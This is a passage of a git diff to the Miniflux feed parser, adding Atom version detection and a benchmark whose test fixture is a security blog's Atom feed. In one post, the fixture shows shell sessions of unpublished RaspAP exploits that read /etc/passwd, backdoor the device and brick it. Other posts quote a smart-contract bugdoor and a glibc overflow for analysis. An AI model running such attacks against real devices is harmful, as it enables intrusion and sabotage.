]]>
-
- `
-
- version := getAtomFeedVersion(bytes.NewReader([]byte(data)))
- if version != "0.3" {
- t.Errorf(`Invalid Atom version detected: %s`, version)
- }
-}
diff --git a/internal/reader/parser/format.go b/internal/reader/parser/format.go
index b0a7c2e3..7919ccf2 100644
--- a/internal/reader/parser/format.go
+++ b/internal/reader/parser/format.go
@@ -21,12 +21,12 @@ const (
)
// DetectFeedFormat tries to guess the feed format from input data.
-func DetectFeedFormat(r io.ReadSeeker) string {
+func DetectFeedFormat(r io.ReadSeeker) (string, string) {
data := make([]byte, 512)
r.Read(data)
if bytes.HasPrefix(bytes.TrimSpace(data), []byte("{")) {
- return FormatJSON
+ return FormatJSON, ""
}
r.Seek(0, io.SeekStart)
@@ -41,14 +41,19 @@ func DetectFeedFormat(r io.ReadSeeker) string {
if element, ok := token.(xml.StartElement); ok {
switch element.Name.Local {
case "rss":
- return FormatRSS
+ return FormatRSS, ""
case "feed":
- return FormatAtom
+ for _, attr := range element.Attr {
+ if attr.Name.Local == "version" && attr.Value == "0.3" {
+ return FormatAtom, "0.3"
+ }
+ }
+ return FormatAtom, "1.0"
case "RDF":
- return FormatRDF
+ return FormatRDF, ""
}
}
}
- return FormatUnknown
+ return FormatUnknown, ""
}
diff --git a/internal/reader/parser/format_test.go b/internal/reader/parser/format_test.go
index 7acf3e7a..9f806270 100644
--- a/internal/reader/parser/format_test.go
+++ b/internal/reader/parser/format_test.go
@@ -10,7 +10,7 @@ import (
func TestDetectRDF(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatRDF {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatRDF)
@@ -19,7 +19,7 @@ func TestDetectRDF(t *testing.T) {
func TestDetectRSS(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatRSS {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatRSS)
@@ -28,7 +28,7 @@ func TestDetectRSS(t *testing.T) {
func TestDetectAtom10(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatAtom {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatAtom)
@@ -37,7 +37,7 @@ func TestDetectAtom10(t *testing.T) {
func TestDetectAtom03(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatAtom {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatAtom)
@@ -46,7 +46,7 @@ func TestDetectAtom03(t *testing.T) {
func TestDetectAtomWithISOCharset(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatAtom {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatAtom)
@@ -60,7 +60,7 @@ func TestDetectJSON(t *testing.T) {
"title" : "Example"
}
`
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatJSON {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatJSON)
@@ -71,7 +71,7 @@ func TestDetectUnknown(t *testing.T) {
data := `
`
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatUnknown {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatUnknown)
diff --git a/internal/reader/parser/parser.go b/internal/reader/parser/parser.go
index 2843888b..d95ea001 100644
--- a/internal/reader/parser/parser.go
+++ b/internal/reader/parser/parser.go
@@ -19,10 +19,11 @@ var ErrFeedFormatNotDetected = errors.New("parser: unable to detect feed format"
// ParseFeed analyzes the input data and returns a normalized feed object.
func ParseFeed(baseURL string, r io.ReadSeeker) (*model.Feed, error) {
r.Seek(0, io.SeekStart)
- switch DetectFeedFormat(r) {
+ format, version := DetectFeedFormat(r)
+ switch format {
case FormatAtom:
r.Seek(0, io.SeekStart)
- return atom.Parse(baseURL, r)
+ return atom.Parse(baseURL, r, version)
case FormatRSS:
r.Seek(0, io.SeekStart)
return rss.Parse(baseURL, r)
diff --git a/internal/reader/parser/parser_test.go b/internal/reader/parser/parser_test.go
index abaf1094..447f73d3 100644
--- a/internal/reader/parser/parser_test.go
+++ b/internal/reader/parser/parser_test.go
@@ -4,10 +4,31 @@
package parser // import "miniflux.app/v2/internal/reader/parser"
import (
+ "os"
"strings"
"testing"
)
+func BenchmarkParse(b *testing.B) {
+ var testCases = map[string][]string{
+ "large_atom.xml": {"https://dustri.org/b", ""},
+ "large_rss.xml": {"https://dustri.org/b", ""},
+ "small_atom.xml": {"https://github.com/miniflux/v2/commits/main", ""},
+ }
+ for filename := range testCases {
+ data, err := os.ReadFile("./testdata/" + filename)
+ if err != nil {
+ b.Fatalf(`Unable to read file %q: %v`, filename, err)
+ }
+ testCases[filename][1] = string(data)
+ }
+ for range b.N {
+ for _, v := range testCases {
+ ParseFeed(v[0], strings.NewReader(v[1]))
+ }
+ }
+}
+
func FuzzParse(f *testing.F) {
f.Add("https://z.org", `
diff --git a/internal/reader/parser/testdata/large_atom.xml b/internal/reader/parser/testdata/large_atom.xml
new file mode 100644
index 00000000..888586b7
--- /dev/null
+++ b/internal/reader/parser/testdata/large_atom.xml
@@ -0,0 +1,1638 @@
+
+Artificial truthhttps://dustri.org/b/2024-03-10T17:15:00+01:00Using vale with vim2024-03-10T17:15:00+01:002024-03-10T17:15:00+01:00jvoisintag:dustri.org,2024-03-10:/b/using-vale-with-vim.html<p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
+(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
+<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goal
+of this little corner on the internet was to improve my English, a purpose it
+keeps serving. Adding some lightweight tooling to my text editor to push this
+goal even further …</p><p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
+(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
+<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goal
+of this little corner on the internet was to improve my English, a purpose it
+keeps serving. Adding some lightweight tooling to my text editor to push this
+goal even further sounds great.</p>
+<p>Like all good software, vale <a href="https://gitlab.alpinelinux.org/alpine/aports/-/tree/master/testing/vale">is
+packaged</a>
+in Alpine, although it looked a tad neglected, so I sent <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/61919">a
+pull-request</a>
+to get it updated.
+Its configuration is pretty straightforward: a <code>~/.vale.ini</code> file, with
+where to store/read its data and some preferences. It comes with a
+<a href="https://vale.sh/hub/">couple of <em>packages</em></a> for popular styles, like the ones
+from <a href="https://vale.sh/hub/microsoft/">Microsoft</a>,
+<a href="https://vale.sh/hub/google/">Google</a>, <a href="https://vale.sh/hub/redhat/">RedHat</a>, … then a simple <code>vale sync</code> to force it to
+download and store the data, and you're good to go.</p>
+<p>While <code>vale</code> can be called from the command line, integration with my text
+editor is way more comfy. I'm sure there are a ton of plugins to integrate it
+with vim, but I'm not a huge fan of having my text editor run arbitrary code
+from the internet, so I threw the following 6 lines in <a href="https://dustri.org/pub/vimrc">my vimrc</a> instead:</p>
+<div class="codehilite"><pre><span></span><code><span class="nv">augroup</span><span class="w"> </span><span class="nv">vale</span>
+<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nv">filereadable</span><span class="ss">(</span><span class="nv">expand</span><span class="ss">(</span><span class="s2">"~/.vale.ini"</span><span class="ss">))</span>
+<span class="w"> </span><span class="nv">autocmd</span><span class="w"> </span><span class="nv">FileType</span><span class="w"> </span><span class="nv">markdown</span><span class="w"> </span><span class="nv">setlocal</span><span class="w"> </span><span class="nv">makeprg</span><span class="o">=</span><span class="nv">vale</span>\<span class="w"> </span><span class="o">--</span><span class="nv">output</span><span class="o">=</span><span class="nv">line</span>\<span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="nv">errorformat</span><span class="o">=%</span><span class="nv">f</span>:<span class="o">%</span><span class="nv">l</span>:<span class="o">%</span><span class="nv">c</span>:<span class="o">%</span><span class="nv">o</span>:<span class="o">%</span><span class="nv">m</span>
+<span class="w"> </span><span class="nv">nnoremap</span><span class="w"> </span><span class="o"><</span><span class="nv">Leader</span><span class="o">></span><span class="nv">M</span><span class="w"> </span>:<span class="nv">make</span><span class="o"><</span><span class="nv">CR</span><span class="o">><</span><span class="nv">CR</span><span class="o">></span>
+<span class="w"> </span><span class="k">end</span>
+<span class="nv">augroup</span><span class="w"> </span><span class="k">end</span>
+</code></pre></div>
+
+<p>It checks if I have a <code>~/vale.ini</code> file, and if so sets
+<a href="https://vimhelp.org/options.txt.html#%27makeprg%27"><code>makeprg</code></a> to vale, and
+configure <a href="https://vimhelp.org/quickfix.txt.html#errorformat"><code>errorformat</code></a> to
+properly parse vale's output. Now every time I type <code><Leader> M</code>, I get vale's
+diagnostics in my <a href="https://vimhelp.org/quickfix.txt.html">quickfix window</a>.</p>
+<p>The next steps would likely be to <s>waste</s> spend some time improving the theme
+of the aforementioned window, add some ad hoc rules to vale, and maybe try to
+show the diagnostics inline like the spellechecker is doing.</p>Carrot disclosure2024-03-08T21:30:00+01:002024-03-08T21:30:00+01:00jvoisintag:dustri.org,2024-03-08:/b/carrot-disclosure.html<p>Once you have found a vulnerability, you can either sit on it, or disclose it.
+There are usually two ways to disclose, with minor variations:</p>
+<ol>
+<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
+ where one gives time to the vendor to issue a fix before disclosing</li>
+<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
+ where one discloses immediately without notifying anyone before …</li></ol><p>Once you have found a vulnerability, you can either sit on it, or disclose it.
+There are usually two ways to disclose, with minor variations:</p>
+<ol>
+<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
+ where one gives time to the vendor to issue a fix before disclosing</li>
+<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
+ where one discloses immediately without notifying anyone before.</li>
+</ol>
+<p>I would like to coin a 3<sup>rd</sup> one: <em>Carrot Disclosure</em>, dangling a
+<a href="https://en.wikipedia.org/wiki/Carrot_and_stick">metaphorical carrot</a> in front
+of the vendor to incentivise change. The main idea is to only publish the
+(redacted) output of the exploit for a critical vulnerability, to showcase that the
+software is exploitable. Now the vendor has two choices: either perform a
+holistic audit of its software, fixing as many issues as possible in the hope
+of fixing the showcased vulnerability; or losing users who might not be happy
+running a known-vulnerable software. Users of this disclosure model are of
+course called Bugs Bunnies.</p>
+<p>We all looked at catastrophic web applications, finding a ton
+of bugs, and deciding not to bother with reporting them, because they were too
+many of them, because we knew that there will be more of them lurking, because
+the vendor is a complete tool and it would take more time trying to properly
+disclose things than it took finding the vulnerabilities, … This is an
+excellent use case for Carrot Disclosure! Of course, for unauditably-large
+codebases, it doesn't work: you've got a Linux LPE, who cares.</p>
+<p>Interestingly, it shifts the work balance a bit: it's usually harder to write
+an exploit than it's to fix here. But here, the vendor has to audit and fix
+its entire codebase, for the ~low cost of one (1) exploit, that you don't even
+have to publish if you don't want to.</p>
+<p>If you want to be extra-nice, you can:</p>
+<ul>
+<li>Publish the SHA256 of the exploit, to prove
+ that you weren't making things up, once it's fixed or if you get sued for
+ whatever frivolous reasons like libel.</li>
+<li>Maintain the exploits against new versions, proving that the exploit is still
+ working.</li>
+<li>Publish the exploit once it has been fixed, otherwise you risk to have
+ vendors call your bluff next time, or at least notify that the issue has been
+ fixed. Since you don't have hardcoded offsets because we're in 2024, you can even
+ put this in a continuous integration.</li>
+</ul>
+<p>Let's have an example, as a treat. A couple of shitty vulnerabilities for
+<a href="https://raspap.com/">RaspAP</a> that took me 5 minutes to find and at least 5
+more to write an exploit for each of them:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp">$ </span>./read-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">5</span>
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Dumping /etc/passwd</span>
+<span class="go">root:x:0:0:root:/root:/bin/bash</span>
+<span class="go">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
+<span class="go">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
+<span class="gp">$ </span>./authed-mitm-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] default login/password in use</span>
+<span class="go">[+] backdooring system…</span>
+<span class="go">[+] system backdoored, enjoy your permanent MITM!</span>
+<span class="gp">$ </span>./brick-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Bricking the system…</span>
+<span class="go">[+] System bricked!</span>
+<span class="gp">$</span>
+</code></pre></div>
+
+<p>It looks like there is a low-hanging unauthenticated arbitrary code execution
+chainable with a privilege escalation to root as well, but since writing an
+exploit would take more than 5 minutes, I can't be bothered, and odds are that
+it'll be fixed along with the persistent denial-of-service anyway. Let me know
+when you think those are fixed.</p>Youtube video embedding harm reduction2024-02-27T14:45:00+01:002024-02-27T14:45:00+01:00jvoisintag:dustri.org,2024-02-27:/b/youtube-video-embedding-harm-reduction.html<p>Embedding external content on a website in the current enshittocene period is
+more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
+video while reducing its tracking and nuisance capabilities as much as possible:</p>
+<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">iframe</span>
+ <span class="na">credentialless</span>
+ <span class="na">allowfullscreen</span>
+ <span class="na">referrerpolicy</span><span class="o">=</span><span class="s">"no-referrer"</span>
+ <span class="na">sandbox</span><span class="o">=</span><span class="s">"allow-scripts allow-same-origin"</span>
+ <span class="na">allow</span><span class="o">=</span><span class="s">"accelerometer 'none'; ambient-light-sensor …</span></code></pre></div><p>Embedding external content on a website in the current enshittocene period is
+more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
+video while reducing its tracking and nuisance capabilities as much as possible:</p>
+<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">iframe</span>
+ <span class="na">credentialless</span>
+ <span class="na">allowfullscreen</span>
+ <span class="na">referrerpolicy</span><span class="o">=</span><span class="s">"no-referrer"</span>
+ <span class="na">sandbox</span><span class="o">=</span><span class="s">"allow-scripts allow-same-origin"</span>
+ <span class="na">allow</span><span class="o">=</span><span class="s">"accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; bluetooth 'none'; browsing-topics 'none'; camera 'none'; ch-ua 'none'; display-capture 'none'; domain-agent 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; gamepad 'none'; geolocation 'none'; gyroscope 'none'; hid 'none'; identity-credentials-get 'none'; idle-detection 'none'; keyboard-map 'none'; local-fonts 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; otp-credentials 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-create 'none'; publickey-credentials-get 'none'; screen-wake-lock 'none'; serial 'none'; speaker-selection 'none'; sync-xhr 'none'; usb 'none'; web-share 'none'; window-management 'none'; xr-spatial-tracking 'none'"</span><span class="err">,</span>
+ <span class="na">csp</span><span class="o">=</span><span class="s">"sandbox allow-scripts allow-same-origin;"</span>
+ <span class="na">width</span><span class="o">=</span><span class="s">"560"</span>
+ <span class="na">height</span><span class="o">=</span><span class="s">"315"</span>
+ <span class="na">src</span><span class="o">=</span><span class="s">"https://www.youtube-nocookie.com/embed/jfKfPfyJRdk"</span>
+ <span class="na">title</span><span class="o">=</span><span class="s">"lofi hip hop radio 📚 - beats to relax/study to"</span>
+ <span class="na">frameborder</span><span class="o">=</span><span class="s">"0"</span>
+ <span class="na">loading</span><span class="o">=</span><span class="s">"lazy"</span>
+<span class="p">></</span><span class="nt">iframe</span><span class="p">></span>
+</code></pre></div>
+
+<ul>
+<li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/IFrame_credentialless"><code>credentialless</code></a> to load youtube in a blank disposable context,
+ without access to the origin's network, cookies, and storage data.</li>
+<li><code>allowfullscreen</code> because some people like it</li>
+<li><code>referrerpolicy</code> set to not leak your <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer">referer</a></li>
+<li><code>sandbox</code> to only allow javascript execution and SOP. Downloads, forms,
+ modals, screen orientation, pointer lock, popups, presentation session,
+ <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage_Access_API">storage access</a> and thus third-party cookies,
+ top-navigation, … are all denied.</li>
+<li><code>allow</code> with <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">every single directives</a>
+ set to "absolutely-fucking-not", and yes, they have to be all set one by one,
+ and check regularly is new directive were added,
+ because there is <a href="https://github.com/w3c/webappsec-permissions-policy/issues/208">no deny-all</a>
+ in the <a href="https://w3c.github.io/webappsec-permissions-policy/">spec</a>. It seems
+ that every browser has its own list of directives, chrome is using <a href="https://github.com/w3c/webappsec-permissions-policy/blob/main/features.md">this one</a>
+ while firefox' prefers the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">MDN one</a>,
+ and of course the two differ. No doubt this was designed with privacy, simplicity, maintainability and security in mind.</li>
+<li><code>src</code> set to <code>www.youtube-nocookie.com</code> instead of <code>youtube.com</code>. Both
+ are official Google urls, but the former doesn't do tracking via cookies,
+ and disables API and interaction and interaction logging. Amusingly, it's
+ the player used on <code>whitehouse.gov</code>.</li>
+<li><code>csp</code> set to <code>sandbox allow-scripts allow-same-origin;</code> for compatibility's
+ sake, just in case.
+ I'd love to use a more restrictive policy, but the spec doesn't allow to
+ provide one, except if the embedded website explicitly allows it, and of
+ course youtube doesn't.</li>
+<li><code>loading="lazy"</code> in case people don't scroll far enough to see the video, no
+ need to make them do queries to Google for no reasons.</li>
+</ul>
+<p>Don't forget to put a <code>title</code> for <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#accessibility_concerns">accessibility's sake</a>.</p>A silly "smart" contract bug2024-02-16T13:30:00+01:002024-02-16T13:30:00+01:00jvoisintag:dustri.org,2024-02-16:/b/a-silly-smart-contract-bug.html<p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
+when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
+apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
+interesting here is the bug, can you spot it?</p>
+<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint …</span></code></pre></div><p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
+when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
+apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
+interesting here is the bug, can you spot it?</p>
+<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint</span><span class="p">)</span><span class="w"> </span><span class="kt">internal</span><span class="w"> </span>virtual<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">fromBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>from<span class="p">];</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">toBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>to<span class="p">];</span>
+<span class="w"> </span><span class="kt">if</span><span class="w"> </span><span class="p">(</span>fromBalance<span class="w"> </span><span class="o"><</span><span class="w"> </span>value<span class="p">)</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span>revert<span class="w"> </span>ERC20InsufficientBalance<span class="p">(</span>from<span class="p">,</span><span class="w"> </span>fromBalance<span class="p">,</span><span class="w"> </span>value<span class="p">);</span>
+<span class="w"> </span><span class="p">}</span>
+
+<span class="w"> </span>unchecked<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="c1">// Overflow not possible: value <= fromBalance <= totalSupply.</span>
+<span class="w"> </span>_balances<span class="p">[</span>from<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>fromBalance<span class="w"> </span><span class="o">-</span><span class="w"> </span>value<span class="p">;</span>
+
+<span class="w"> </span><span class="c1">// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.</span>
+<span class="w"> </span>_balances<span class="p">[</span>to<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>toBalance<span class="w"> </span><span class="o">+</span><span class="w"> </span>value<span class="p">;</span>
+<span class="w"> </span><span class="p">}</span>
+</code></pre></div>
+
+<p>As a hint, look at <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f">this transaction</a>.
+Isn't it a cute bugdoor?</p>
+<p>The snippet is taken from <a href="https://twitter.com/shoucccc/status/1757777764646859121">this tweet</a>,
+giving the issue away. Thanks to <a href="https://github.com/kjsman">Jinseo Kim</a> for holding my hand
+understanding what was going on there.</p>Fixing the /usr/lib/ssl/certs debacle with Alpine Linux on Proxmox2024-02-05T17:00:00+01:002024-02-05T17:00:00+01:00jvoisintag:dustri.org,2024-02-05:/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html<p>There are currently some issues with regard to OpenSSL and Alpine Linux on
+Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Promox since the 19<sup>th</sup> of January, with some patches sent by
+email (sigh) to fix the issue still waiting to land. The root cause being
+Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl …</code></p><p>There are currently some issues with regard to OpenSSL and Alpine Linux on
+Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Promox since the 19<sup>th</sup> of January, with some patches sent by
+email (sigh) to fix the issue still waiting to land. The root cause being
+Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl/cert.pem'</code> when <code>pct enter</code> is
+used, while on Alpine the <code>cert.pem</code> file is in <code>/etc/ssl/cert.pem</code>.</p>
+<p>In the meantime, here is what the problem looks like (for
+<a href="https://en.wikipedia.org/wiki/Search_engine_optimization">SEO</a>) and how to
+hack around it: </p>
+<div class="codehilite"><pre><span></span><code><span class="go">root@pve ~ pct enter 122</span>
+<span class="gp"># </span>apk<span class="w"> </span>update
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/main: Permission denied</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/community: Permission denied</span>
+<span class="go">4 unavailable, 0 stale; 30 distinct packages available</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve ~ lxc-attach -n 122 </span>
+<span class="gp"># </span>apk<span class="w"> </span>update<span class="p">;</span><span class="w"> </span>apk<span class="w"> </span>upgrade
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">v3.18.6-10-g1bb71e18dfb [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]</span>
+<span class="go">v3.18.6-9-g41de282e84d [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]</span>
+<span class="go">OK: 20069 distinct packages available</span>
+<span class="go">OK: 10 MiB in 30 packages</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve 16:58 ~ </span>
+</code></pre></div>
+
+<p>tl;dr: <code>lxc attach -n 123</code> instead of <code>pct enter 123</code></p>Musings on CVE-2023-6246 on hardened_malloc2024-01-31T02:00:00+01:002024-01-31T02:00:00+01:00jvoisintag:dustri.org,2024-01-31:/b/musings-on-cve-2023-6246-on-hardened_malloc.html<p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
+a couple of hours ago a linear two-step heap buffer overflow in glibc's
+<code>syslog()</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
+<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
+<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags …</span></code></pre></div><p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
+a couple of hours ago a linear two-step heap buffer overflow in glibc's
+<code>syslog()</code>:</p>
